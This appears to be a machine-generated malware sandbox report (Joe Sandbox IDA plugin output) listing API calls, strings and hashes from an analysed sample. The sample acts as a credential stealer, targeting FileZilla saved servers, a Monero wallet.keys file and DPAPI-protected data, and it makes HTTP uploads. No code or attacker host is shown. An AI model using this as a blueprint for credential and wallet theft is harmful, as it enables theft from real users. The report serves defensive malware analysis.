                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -Go$4>#$e\c$e\c
                              • API String ID: 0-1158676964
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: M/{$Qp|${m*$2E
                              • API String ID: 0-2622164832
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E005B7), ref: 00DF86CA
                              • Process32First.KERNEL32(?,00000128), ref: 00DF86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00DF86F3
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • CloseHandle.KERNEL32(?), ref: 00DF8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00DE5184,40000001,00000000,00000000,?,00DE5184), ref: 00DF8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E00,00000000,?), ref: 00DF79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00E00E00,00000000,?), ref: 00DF79C4
                              • wsprintfA.USER32 ref: 00DF79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0197EBF0,00000000,?,00E00E10,00000000,?,00000000,00000000), ref: 00DF7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0197EBF0,00000000,?,00E00E10,00000000,?,00000000,00000000,?), ref: 00DF7A7D
                              • wsprintfA.USER32 ref: 00DF7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              APIs
                              • CoCreateInstance.COMBASE(00DFE118,00000000,00000001,00DFE108,00000000), ref: 00DF3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00DF37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                              • LocalFree.KERNEL32(?), ref: 00DE9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E015B8,00E00D96), ref: 00DEF71E
                              • StrCmpCA.SHLWAPI(?,00E015BC), ref: 00DEF76F
                              • StrCmpCA.SHLWAPI(?,00E015C0), ref: 00DEF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00DEFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: F.+?
                              • API String ID: 0-1845388099
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00E00DBA,00E00DB7,00E00DB6,00E00DB3), ref: 00DF0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00DF0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00DF03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00DF0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00DF0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00DF0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00DF0571
                              • lstrcat.KERNEL32(?,url: ), ref: 00DF0580
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF0593
                              • lstrcat.KERNEL32(?,00E01678), ref: 00DF05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF05B5
                              • lstrcat.KERNEL32(?,00E0167C), ref: 00DF05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00DF05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF05E6
                              • lstrcat.KERNEL32(?,00E01688), ref: 00DF05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00DF0604
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF0617
                              • lstrcat.KERNEL32(?,00E01698), ref: 00DF0626
                              • lstrcat.KERNEL32(?,00E0169C), ref: 00DF0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE59F8
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0197F1A8,00000000,?,01979E38,00000000,?,00E01A1C), ref: 00DE5E71
                              • lstrlen.KERNEL32(00000000), ref: 00DE5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00DE5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00DE5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00DE5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00DE5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00DE5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00DE5FBD
                              • HttpOpenRequestA.WININET(00000000,0197F148,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE5BF8
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00DE5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 7c8c9e81f869676f7e0567cec837b83b2ff0838cd9dc24321943d97c95a1b2f8
                              • Instruction ID: 91ffffb41133831c9727c34fa49c0c9283318a3b8e000917c6055357f551e171
                              • Opcode Fuzzy Hash: 7c8c9e81f869676f7e0567cec837b83b2ff0838cd9dc24321943d97c95a1b2f8
                              • Instruction Fuzzy Hash: B2121CB192012CAACB15EBA4DC95FEEB378FF14740F5181A9F20A66091DF702A49CF75
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DECF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DED0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DED0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED208
                              • lstrcat.KERNEL32(?,00E01478), ref: 00DED217
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED22A
                              • lstrcat.KERNEL32(?,00E0147C), ref: 00DED239
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED24C
                              • lstrcat.KERNEL32(?,00E01480), ref: 00DED25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED26E
                              • lstrcat.KERNEL32(?,00E01484), ref: 00DED27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED290
                              • lstrcat.KERNEL32(?,00E01488), ref: 00DED29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED2B2
                              • lstrcat.KERNEL32(?,00E0148C), ref: 00DED2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00DED2D4
                              • lstrcat.KERNEL32(?,00E01490), ref: 00DED2E3
                                • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                                • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                              • lstrlen.KERNEL32(?), ref: 00DED32A
                              • lstrlen.KERNEL32(?), ref: 00DED339
                                • Part of subcall function 00DFAA70: StrCmpCA.SHLWAPI(01978A20,00DEA7A7,?,00DEA7A7,01978A20), ref: 00DFAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00DED3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: c26f1de6c67ff72ca5c5f5a8a0a0073822e38c5c879045209ff9e807791361a6
                              • Instruction ID: f2a94d4f619e5b62b5bc4d2cc2ef7357dcc6e0e24b4631efe375152d5845d79e
                              • Opcode Fuzzy Hash: c26f1de6c67ff72ca5c5f5a8a0a0073822e38c5c879045209ff9e807791361a6
                              • Instruction Fuzzy Hash: 52E13FB1910109ABCB24FBA4DD96EFE7378EF14300F118158F60AB7495DE75AA09CB71
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0197CDA0,00000000,?,00E0144C,00000000,?,?), ref: 00DECA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00DECA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00DECA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DECAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00DECAD9
                              • StrStrA.SHLWAPI(?,0197CDD0,00E00B52), ref: 00DECAF7
                              • StrStrA.SHLWAPI(00000000,0197CD10), ref: 00DECB1E
                              • StrStrA.SHLWAPI(?,0197D050,00000000,?,00E01458,00000000,?,00000000,00000000,?,019789D0,00000000,?,00E01454,00000000,?), ref: 00DECCA2
                              • StrStrA.SHLWAPI(00000000,0197D1F0), ref: 00DECCB9
                                • Part of subcall function 00DEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                                • Part of subcall function 00DEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                              • StrStrA.SHLWAPI(?,0197D1F0,00000000,?,00E0145C,00000000,?,00000000,019789E0), ref: 00DECD5A
                              • StrStrA.SHLWAPI(00000000,019787C0), ref: 00DECD71
                                • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                                • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                                • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                              • lstrlen.KERNEL32(00000000), ref: 00DECE44
                              • CloseHandle.KERNEL32(00000000), ref: 00DECE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: d841fb3369bcdc9e7180d58ceb1fae0e6db283f69de37d05bdd473f3e87a87ca
                              • Instruction ID: 820abd9a2c99cc36af665e1157b14b8287853009bdf1b7b3f9e2cedb2a073d36
                              • Opcode Fuzzy Hash: d841fb3369bcdc9e7180d58ceb1fae0e6db283f69de37d05bdd473f3e87a87ca
                              • Instruction Fuzzy Hash: 34E1FAB190010CABDB14EBA8DC91FEEB778EF14340F518169F20A67195EF746A4ACB71
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • RegOpenKeyExA.ADVAPI32(00000000,0197AA38,00000000,00020019,00000000,00E005B6), ref: 00DF83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                              • wsprintfA.USER32 ref: 00DF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
